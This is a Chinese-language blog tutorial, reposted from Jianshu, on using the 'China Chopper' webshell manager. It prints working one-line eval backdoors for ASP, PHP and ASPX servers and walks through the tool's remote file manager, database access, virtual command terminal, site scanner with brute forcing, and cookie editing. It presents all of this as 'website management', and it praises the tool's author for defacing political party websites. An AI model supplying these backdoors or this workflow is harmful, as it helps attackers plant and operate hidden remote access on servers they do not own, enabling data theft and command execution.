[渗透工具][中国菜刀]用法全解

转自：http://www.jianshu.com/p/f0797a485779

1.简单简绍

中国菜刀是一款专业的网站管理软件，用途广泛，使用方便，小巧实用。只要支持动态脚本的网站，都可以用中国菜刀来进行管理！在非简体中文环境下使用，自动切换到英文界面。
UINCODE方式编译，支持多国语言输入显示。(引用于百度百科中国菜刀
_百度百科)
作者:
说起菜刀，就不得不提起菜刀的作者，作者是一个退伍军人，生长在一个贫穷的农村，据说初中也没读完，英语更是不咋地，但他却自学掌握了

C++/J2ME/PHP/JSP/ASP.NET(C#,VB,C++,delphi,J#)/ASP/MySQL/MsSQL/Oracle/Informix/PostgreSQL/DB2/Sybase/Access/UNIX/LINUX/WIN/SEO/Flash(AS)/PhotoShop/Freehand

等等，当初在六七年前台湾闹独立的时候，他在国民党和民进党的网站上留下了“只有一个中国”的黑页，一举成名。

作者是一个朴实，低调的技术牛人，他这些年留下的作品很多，中国菜刀是他最新的一个作品，从他之前的作品WEBSHELL管理器的基础上修改而来，功能更加的强大。

你见过很强大的ASP后门，很强大的PHP后门，很强大的ASPX后门，那你见过很强大的asp,aspx,php三合一后门么……..，没有吧，尤其是这个后门，只有一句话。

Asp环境：<%eval request(“a”)%>

Php环境：<?php @eval($_POST[‘a’]);?>

Aspx环境：<% @page Language=”Jscript”><%eval(Request.item[“a”],”unsafe”);%>

Paste_Image.png

2.常见的管理

右键空白处->添加

Paste_Image.png

添加SHELL -> 进行相关的配置。

Paste_Image.png

我的配置：
地址：http://localhost/a.php

密码：
key

脚本类型：
PHP

最后
->点击添加

相关的介绍：

这里的
WEBSHELL是我们常说的一句话木马：

PHP一句话木马：<?php @eval($_POST['key']);?>

ASP一句话木马：<%eval request['key']%>

ASPX一句话木马：<%@ Page Language="Jscript"%><%eval(Request.Item["key"],"unsafe");%>

眼尖的童鞋已经看到了三个里面都带有
key这个单词，没错这个就是密码，大家可以自行修改为自己使用的密码。

功能概述：

Paste_Image.png

文件管理：
打开方式 [右键WEBSHELL->单击文件管理]

Paste_Image.png

管理方式 [右键上图中方框内的任何区域进行管理]

Paste_Image.png

数据库管理：
打开方式 [右键WEBSHELL->数据库管理]

Paste_Image.png

可以看到是空白的，这时候就需要配置数据库信息了。
配置方式1.[单击配置]

Paste_Image.png

出现了一个配置窗口。(前提你要有网站数据库的配置信息才可以进行配置)
我的配置信息：
数据库类型：Mysql
用户名：root
密码：root
配置方式 2.[选择数据库]

Paste_Image.png

可以看到红色方框那边有MYSQL、MSSQL、MSSQL2、ORACLE等数据库类型。
我是Mysql的就选择mysql的示例：

Paste_Image.png

配置后 [单击提交]：

Paste_Image.png

管理方式：

Paste_Image.png

虚拟终端：
打开方式 [右键WEBSHELL->单击虚拟终端]

Paste_Image.png

红色方框里是系统的一些信息。我们在D:\WWW>后面输入相应的cmd命令即可(Linux就输入shell命令)
2.网站扫描
打开方式 [单击菜刀图标->单击网站扫描]

Paste_Image.png

(也可以在软件里使用快捷键Alt+K去打开)

Paste_Image.png

使用方法：

把
http://www.http://maicaidao.com替换成自己的测试站点即可。

功能：

1.反向IP(reverse_ip)

2.爬虫(spider)
3.爆破(crack)
其他按照这些提示都应该能懂就不一一去说了。
3.浏览器功能

Paste_Image.png

打开方法如上图示意。

Paste_Image.png

对着网页进行右击：

Paste_Image.png

上图是一些浏览器方面的功能。
单击扩展功能:

Paste_Image.png

可以进行cookie的修改。
同时也可以单击菜刀图标->浏览器：

Paste_Image.png

可以进行选择：

代表开启 可以单击进行取消开启。

4.其他功能
第一：设置菜刀启动密码(防止自己的WEBSHELL泄露出去)

Paste_Image.png

打开方式 [单击菜刀图标->单击设置启动密码]

Paste_Image.png

点击是，就成功设置密码为test。
然后我们关掉菜刀再打开菜刀：
输入我们的密码再可以设置新的密码：

Paste_Image.png

我相信着点英语难不倒各位也不解释了。
也可以把启动密码取消掉：

作者：Adapa
链接：http://www.jianshu.com/p/f0797a485779
來源：简书
著作权归作者所有。商业转载请联系作者获得授权，非商业转载请注明出处。